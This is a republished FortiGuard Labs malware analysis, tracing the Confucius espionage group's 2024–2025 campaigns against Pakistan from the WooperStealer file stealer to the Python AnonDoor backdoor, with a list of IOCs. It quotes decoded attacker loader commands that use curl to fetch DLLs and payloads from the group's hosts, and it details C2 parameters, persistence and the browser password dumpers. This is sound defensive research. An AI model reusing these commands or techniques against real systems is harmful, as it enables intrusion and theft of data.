The Confucius group is a long-running cyber-espionage actor operating primarily across South Asia. First identified in 2013, the group is believed to have links to state-sponsored operations in the region. Over the past decade, Confucius has repeatedly targeted government agencies, military organizations, defense contractors, and critical industries, especially in Pakistan, using spear-phishing and malicious documents as initial access vectors. Recent campaigns have highlighted a sharp evolution in tactics, shifting from document stealers like WooperStealer to Python-based backdoors such as AnonDoor. This progression underscores Confucius’ adaptability and the growing sophistication of state-aligned malware campaigns in the region.
Over the past several months, our friends at FortiGuard Labs have observed Confucius evolving its tradecraft, leveraging weaponized Office documents, malicious LNK files, and multiple malware families, including custom Python RATs and advanced stealers. The group has demonstrated strong adaptability, layering obfuscation techniques to evade detection and tailoring its toolset to align with shifting intelligence-gathering priorities. Its recent campaigns not only illustrate Confucius’ persistence but also its ability to pivot rapidly between techniques, infrastructure, and malware families to maintain operational effectiveness. In this article, Fortinet will provide a chronological walkthrough of Confucius’ recent activity.
Figure 1: Confucius’ activities - December 2024 – Document.ppsx Infection Chain
This phishing email campaign targeted users in Pakistan. The message relied on authority spoofing, minimal context, and an action-oriented request to entice the recipient into opening the attachment and kick off the infection chain.
Figure 2: Phishing email
Once Document.ppsx was opened, it displayed a “Corrupted Page” message. An embedded OLE object in slide1.xml.rels then triggered a script in the background from the remote URL greenxeonsr.info.
Figure 3: Malicious URL
The mango44NX.doc file is a VBScript that forms a compact dropper with persistence and execution staging capabilities. The first part downloads a remote payload from hxxps://greenxeonsr[.]info/Jsdfwejhrg.rko via MSXML2.XMLHTTP, writes the raw response bytes into %LocalAppData%\Mapistub.dll using an ADODB.Stream, and then closes the stream.
Figure 4: Download DLL
It then copies C:\Windows\System32\fixmapi.exe to the directory %AppData% as Swom.exe and writes a registry string value under HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\load that points to it for persistence.
It finally uses a reconstructed Shell. Application COM object to launch Swom.exe to achieve DLL side-loading and execute the malicious DLL Mapistub.dll.
Figure 5: Registry setting
The malicious DLL Mapistub.dll prepared two remote addresses (cornfieldblue[.]info and hauntedfishtree[.]info) for the next stage of stealer activity.
Figure 6: MSIL downloader
After downloading the data, it loaded the file with a hard-coded method Yretisdkjhsfkjfh.
Figure 7: Hard-coded method
Analysis revealed that the final-stage payload was WooperStealer, identifiable by the stringToEscape variable Class1.Wooper. This stealer was configured to collect a wide range of file types with specific extensions: .txt, .TXT, .pdf, .PDF, .png, .PNG, .jpg, .JPG, .doc, .DOC, .xls, .XLS, .xlm, .XLM, .odp, .ODP, .ods, .ODS, .odt, .ODT, .rtf, .RTF, .ppt, .PPT, .xlsx, .XLSX, .xlsm, .XLSM, .docx, .DOCX, .pptx, .PPTX, .docm, .DOCM, .jpeg, .JPEG, .eml, .EML, .pst, .PST, .ZIP, .zip, .RAR, .rar. It parses the compromised system with Directory.GetLogicalDrives and uploads stolen data to the remote URL hxxp://marshmellowflowerscar[.]info.
Figure 8: WooperStealer - 2025 March – Invoice_Jan25.pdf.lnk Infection Chain
By early 2025, the Confucius group had shifted to using malicious LNK files in their campaigns. During their investigation, they obtained a sample associated with the machine ID desktop-1tjntib. It prepared a legitimate execution file, BlueAle.exe, which was copied from C:\Windows\System32\fixmapi.exe, and downloaded a malicious DLL and decoy PDF form, petricgreen.info, from a remote server.
The decoded $x command is:
curl -o ($pa + '\mapistub.dll') “hxxps://petricgreen[.]info/RPXFD38WAPR7.rko”;$j=$env:TMP + '\file.pdf'; curl -o $j “hxxps://petricgreen[.]info/BWN9ZAP.rko”;
Figure 9: LNK file
The malicious DLL, mapistub.dll, copied targeted files into C:\Windows\Tasks and established persistence by adding registry entries.
Figure 10: Registry setting
The DLL embedded two Base64-encoded strings, representing remote hosts for the final payload. Once the additional data was downloaded, the DLL invoked it using the same hard-coded method observed in earlier activity.
Figure 11: MSIL downloader
The final payload was again identified as WooperStealer, this time with minor modifications to its target list of file extensions: .zip, .rar, .eml, .txt, .TXT, .pdf, .PDF, .png, .PNG, .jpg, .JPG, .DOC, .doc, .XLS, .xls, .xlm, .XLM, .odp, .ODP, .ods, .ODS, .odt, .ODT, .rtf, .RTF, .ppt, .PPT, .xlsx, .XLSX, .xlsm, .XLSM, .docx, .DOCX, .pptx, .PPTX, .docm, .DOCM,, .jpeg, .JPEG.
Figure 12: Targeted directory list
Figure 13 shows the familiar stringToEscape variable Class1.Wooper, solidifying attribution to WooperStealer.
Figure 13: WooperStealer
WooperStealer uses POST requests to upload stolen files with three parameters. value1 included the victim’s system identifiers (<SerialNumber>_<ComputerName>_<UserName>), value2 carried the file path, and value3 transmitted the file hash. This hash-based check ensured that files were not uploaded multiple times.
Figure 14: Uploaded stolen file
Figure 15: Transmitting the hash of the stolen file
Based on the telemetry gathered by researchers, this attack targets users in Pakistan.
Figure 16: Telemetry - 2025 August – New Python Backdoor
In August, analysts observed another malicious LNK file, NLC.pdf.lnk, that leveraged a similar execution technique but introduced new payloads. The decoded command in the $x variable revealed the following activity:
curl -o ($pa + '\python313.dll') “bloomwpp.info/KM9XFY.kut”;curl -o $c “bloomwpp.info/WTBXX46.kut”;$j=$env:TMP + '\file.pdf'; curl -o $j “bloomwpp.info/JRC89.kut”;
It applies a long numeric array that is piped through %{[char]($_-217)} to reconstruct a script, which it then executes with IEX. It then fetches data from bloomwpp.info and writes it to %LocalAppData% using the filenames python313.dll and BlueAle.exe, along with a temporary PDF file named file.pdf. The PDF is then opened immediately to distract the user while BlueAle.exe performs DLL side-loading to invoke the malicious python313.dll.
Figure 17: LNK file
Unlike previous campaigns that deployed WooperStealer, python313.dll sets up an execution environment for a new Python-based backdoor. It first creates a temporary PowerShell script at %TEMP%\_CL_cb7565c393993c050319426106747613in.ps1, downloaded from hxxps://bloomwpp[.]info/hjopjhfgda.ps1, which installs Scoop and configures the environment variables required to ensure Python code can execute without errors.
Figure 18: MSIL downloader
Figure 19: Preparing the Python execution path
It then constructs a remote URL, hxxps://bloomwpp[.]info/hjdfyebvghu[.]pyc, downloads the raw bytes via a synchronous GetByteArrayAsync call, and writes the received bytes to a file named winresume.pyc under the current user’s %LOCALAPPDATA% directory. After writing the file, it marks the file hidden using FileAttributes.Hidden.
Figure 20: Entry point
It constructs the target file path string %LOCALAPPDATA%\winresume.pyc and then uses a scheduled task to create a task named NetPolicyUpdate that executes pythonw.exe from a Scoop install from the previous PowerShell script %USERPROFILE%\scoop\apps\python\current\pythonw.exe, using the .pyc as an argument every 5 minutes. It then prepares this task for persistence to conceal its attack beyond the previous registry setting and acts as a stealthy launcher as it has no console window.
Figure 21: Persistence setting preparation
Figure 22: Scheduled task
The PYC file winresume.pyc serves as a backdoor that collects system information, contacts its C2 server, and receives commands for further action.
Figure 23: PYC version of AnonDoor
The following analysis is based on the disassembly code from the PYC file.
Figure 24: Disassembly code of the PYC file
By dropping a timestamp into %TEMP%\wctDD1A.tmp, AnonDoor ensures its heavier tasks run at most once every 6 minutes on a host. That reduces noise, avoids redundant exfil, and ensures more controlled timing.
Figure 25: TEMP file to track execution time
It runs a compact fingerprinting routine that quietly profiles the host and its network before performing any noisy actions. It derives the local egress IP and grabs the hostname and logged-in user. It then fingerprints the OS with platform.platform(). For external context, it queries several public IP echo services in sequence (api.ipify.org, ipinfo.io/ip, icanhazip.com, and ifconfig.me/ip). Once it has a public IP, it geo-locates the country via ip-api.com and ipwhois.app. To uniquely tag hardware, it executes a hidden wmic csproduct get uuid command.
Figure 26: Get system information
AnonDoor consolidates the collected system information into the parameter uhhg using $!!$ as a delimiter between fields. The resulting data is transmitted to the C2 server, where access and retrieval appear to be restricted to specific geographic targets such as Pakistan. The overall packet structure closely mirrors that of the earlier MSIL-based AnonDoor backdoor, underscoring Confucius’ recent transition toward deploying a Python-based variant of AnonDoor.
Figure 27: C2 server information
Figure 28: C2 connection
It uses the Windows API GetDiskFreeSpaceExW to quietly inventory local storage. It then walks drive letters A:\ through Z:\, checks which paths exist, and for each live volume calls GetDiskFreeSpaceExW. It then converts bytes to GiB using an integer division of 1,073,741,824 and emits compact entries like C:476GB/ Free-120GB, joining all volume information and sending it to the C2 server with the parameter fhgfh.
Figure 29: Get the system's volume information
AnonDoor then contacts its C2 server with the parameter cuud to request further tasks. If the server replies raw task data with anything other than the string Somethingworng1, it immediately sends a POST request back with sout=<ID>@$$@<raw_task_data>. It then splits the data using #$$ and dispatches based on the task name. It supports a series of commands, including CmdExecution, Screenshoot, fileListing, DownloadFile, Directory_listing, FolderDownload, basicinfo, and PasswordDumper. For some tasks, AnonDoor downloads another Python file from the URL inside <raw_task_data> and executes it.
Figure 30: Constructing a packet for a C2 command
Figure 31: Handling the C2 command
Take the Screenshoot command, for example. AnonDoor receives the module URL hxxps://bloomwpp[.]info/DubjW967VGHD3ykdnhkdhn/dsdcrjhdeenidufoft.py, which is used to capture the victim’s screen. It then builds PNG data of the screenshot into the format of <uuid>!$$$!Screenshoot!$$$!<command>###<module_url>!$$$!<ID>!$$$!<PNG_base64>. It then encodes the entire data with Base64 and sends it back to the C2 server with the parameter SCtat.
Figure 32: Python module for Screenshoot
Figure 33: Python module for fileListing
For PasswordDumper, which we observed in September, the URL is hard-coded in the PYC file. AnonDoor routes that task to download both helpers from bloomwpp[.]info and caches their source in memory.
During execution, it chooses which helper to run based on the task’s target. Fohjdfj783mq9XX.py is for Firefox, and Fodkh3897mgfdjiuED.py is for Edge.
Figure 34: Dump of Firefox data
Figure 35: Dump of Edge data
Conclusion - Our analysis reveals how the Confucius group has continually evolved its techniques, adopting diverse file types as initial access vectors and chaining OLE objects, malicious scripts, LNK files, PowerShell loaders, MSIL downloaders, and heavily obfuscated payloads to evade detection. This campaign highlights the group’s technical agility, switching between malware families, including WooperStealer, the MSIL-based AnonDoor, and its Python-based variant.
The layered attack chain leverages encoded components, DLL side-loading, and scheduled task persistence to secure long-term access and exfiltrate sensitive data while minimizing visibility. As threat actors persistently refine their methods to bypass defenses, maintaining vigilance against varied attack techniques is critical. FortiGuard Labs will continue to closely monitor these evolving operations, providing users with timely and comprehensive protection.[1]
IOCs
Domain:
marshmellowflowerscar.info
greenxeonsr.info
cornfieldblue.info
hauntedfishtree.info
petricgreen.info
bloomwpp.info
dropmicis.info
martkartout.info
PPSX:
c91917ff2cc3b843cf9f65e5798cd2e668a93e09802daa50e55a842ba9e505de
LNK:
5a0dd2451a1661d12ab1e589124ff8ecd2c2ad55c8f35445ba9cf5e3215f977e
4206ab93ac9781c8367d8675292193625573c2aaacf8feeaddd5b0cc9136d2d1
DLL:
8603b9fa8a6886861571fd8400d96a705eb6258821c6ebc679476d1b92dcd09e
24b06b5caad5b09729ccaffa5a43352afd2da2c29c3675b17cae975b7d2a1e62
13ca36012dd66a7fa2f97d8a9577a7e71d8d41345ef65bf3d24ea5ebbb7c5ce1
PYC:
06b8f395fc6b4fda8d36482a4301a529c21c60c107cbe936e558aef9f56b84f6
11391799ae242609304ef71b0efb571f11ac412488ba69d6efc54557447d022f
This article is shared with permission at no charge for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC). For questions, comments, or assistance, please contact the office directly at 1-844-492-7225 or feedback@redskyalliance.com
- Reporting: https://www.redskyalliance.org/
- Website: https://www.redskyalliance.com/
- LinkedIn: https://www.linkedin.com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122
[1] https://www.fortinet.com/blog/threat-research/confucius-espionage-from-stealer-to-backdoor/
Comments